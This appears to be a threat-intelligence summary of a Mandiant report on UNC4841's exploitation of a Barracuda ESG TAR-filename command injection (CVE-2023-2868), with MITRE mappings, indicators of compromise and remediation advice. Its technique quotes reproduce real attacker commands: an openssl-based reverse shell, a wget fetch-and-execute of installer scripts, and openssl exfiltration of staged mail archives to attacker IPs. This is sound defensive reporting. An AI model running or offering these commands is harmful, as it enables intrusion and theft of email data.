Keypoints
- UNC4841 exploited CVE-2023-2868 (TAR filename command injection) via email attachments to gain RCE on Barracuda ESG appliances.
- The actor delivered a reverse shell by embedding backtick-quoted payloads in archived filenames that decode and execute base64-encoded shell commands.
- Post-exploitation, UNC4841 downloaded and installed multiple backdoors and modules (SEASPY, SALTWATER, SEASIDE, WHIRLPOOL) and trojanized LUA modules (SEASPRAY, SKIPJACK).
- Persistence was achieved via cron jobs, modifications to /etc/init.d/rc or update_version, and a kernel rootkit (SANDBAR) to hide processes.
- Exfiltration used staged .tar.gz files from /mail/tmp or targeted mstore searches and transported data via openssl s_client to attacker infrastructure.
- The campaign demonstrated rapid TTP changes after remediation (packing, auth, time-stomping, component changes), indicating an adaptive espionage operator.
- Mandiant recommends isolating/replacing compromised ESG appliances and conducting thorough hunting, credential/certificate rotation, and forensic imaging.
MITRE Techniques
- [T1190] Exploit Public-Facing Application β UNC4841 exploited a TAR filename parsing vulnerability in Barracuda ESG to execute system commands. Quote: (βqx{$tarexec -O -xf $tempdir/parts/$part β$fβ};β)
- [T1566.001] Phishing: Spearphishing Attachment β The actor delivered exploit TARs via email attachments to targeted organizations. Quote: (βUNC4841 sent emails β¦ that contained specially crafted TAR file attachments designed to exploit CVE-2023-2868β)
- [T1059] Command and Scripting Interpreter β Post-exploit, the actor ran shell commands and Python to spawn interactive shells and reverse connections. Quote: (βsetsid sh -c βmkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107.148.149[.]156:8080 >/tmp/p 2>/dev/null;rm /tmp/pββ)
- [T1105] Ingress Tool Transfer β Secondary backdoors and installers were fetched from attacker servers using wget and then executed. Quote: (βwget βno-check-certificate https://107.148.219[.]53:443/install_reuse/install_reuse.tar;tar -xvf install_reuse.tar;chmod +x update_v35.sh;./update_v35.shβ)
- [T1071.001] Application Layer Protocol: Web Protocols β Command-and-control and exfiltration used TLS/HTTPS channels (openssl s_client) to attacker IPs and domains. Quote: (βopenssl s_client -quiet -connect 137.175.51[.]147:443 < /mail/tmp/.tar.gz 2>&1β)
- [T1053.003] Scheduled Task/Job: Cron β Persistent reverse shells and execution were scheduled via hourly/daily cron jobs on the ESG. Quote: (β/etc/cron.hourly/core.shβ, β/etc/cron.daily/core.shβ)
- [T1014] Rootkit β A trojanized kernel module (SANDBAR / nfsd_stub.ko) was used to hide processes and obscure malware presence. Quote: (β/lib/modules/4.9.17-barracuda0/kernel/net/sunrpc/nfsd_stub.koβ)
- [T1543] Create or Modify System Process β The actor altered init scripts and appliance scripts to start backdoors on boot and on service run. Quote: (βecho -e β/sbin/BarracudaMailService eth0β² >> /etc/init.d/rcβ)
Indicators of Compromise
- [IP Address] C2 and hosting infrastructure β 107.148.149.156 (reverse shell listener), 107.148.219.53 (malware hosting), and 60+ additional IPs listed in the report.
- [Domain] Phishing/C2 domains observed β bestfindthetruth[.]com, gesturefavour[.]com, and 6 more domains used for delivery or resolution to C2.
- [File Hash] Payload/installers β 0d67f50a0bf7a3a017784146ac41ada0 (snapshot.tar payload), 827d507aa3bde0ef903ca5dec60cdec8 (mod_udp.so / SALTWATER), and many other hashes in the endpoint table.
- [Filename] Malicious files and scripts β BarracudaMailService (SEASPY binary), install_reuse.tar (SALTWATER installer), update_v35.sh (installer script), core.sh / aacore.sh (cron jobs).
- [Certificate / SHA-256] SSL certs used/harvested β SHA-256: 6d1d7fe5be6f1db2d7aa2af2b53ef40c2ac06954d983bb40590944c4d00b6e57 (certificate observed on infrastructure), and other self-signed certs used to masquerade traffic.
UNC4841 exploited CVE-2023-2868 by embedding command-substitution payloads in TAR archive filenames that were parsed unsafely by a Perl qx{} call in the ESG attachment-screening code. The exploit filenames used backticks and single quotes to inject a small bootstrap that decoded a base64 payload; that payload commonly created a named pipe and used openssl s_client to establish a TLS-backed reverse shell to attacker infrastructure (example payload decodes to a command like: setsid sh -c βmkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107.148.149[.]156:8080 >/tmp/p β¦β).
After initial access the operator staged and fetched secondary tooling via inbound wget commands (often ignoring certificate checks), extracting TAR installers (e.g., install_reuse.tar) and running installer scripts (update_v35.sh). Primary implants comprised three families: SEASPY (passive PCAP-based backdoor on TCP/25 and TCP/587 activated by a magic packet), SALTWATER (a funchook-based module for bsmtpd providing Download/Upload/Proxy/Shell/Tunnel channels), and SEASIDE (a Lua HELO/EHLO listener that decodes a C2 IP:port and invokes an external WHIRLPOOL binary to create a TLS reverse shell). The actor also trojanized legitimate LUA modules (SEASPRAY, SKIPJACK) to launch WHIRLPOOL or decode AES-encrypted Content-ID values and execute them, and deployed SANDBAR (a trojanized nfsd_stub.ko kernel module) to hide processes.
Persistence and data theft were operationalized via multiple mechanisms: hourly/daily cron jobs (e.g., /etc/cron.hourly/core.sh), modification of /etc/init.d/rc and appliance scripts to invoke the SEASPY binary on boot, inserting system() calls into update_version, and installing the SANDBAR kernel module under /lib/modules/β¦/nfsd_stub.ko. Targeted email collection used scripts that searched the appliance mstore for matching recipient addresses, tarred results to /mail/tmp/, and exfiltrated archives using openssl s_client to attacker IPs/ports. Defenders should treat compromised ESG appliances as fully controlled, isolate/replace them, collect forensic images, hunt for the listed IOCs, rotate credentials and certificates, and review email and network logs for the listed transfer patterns.
Read more: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally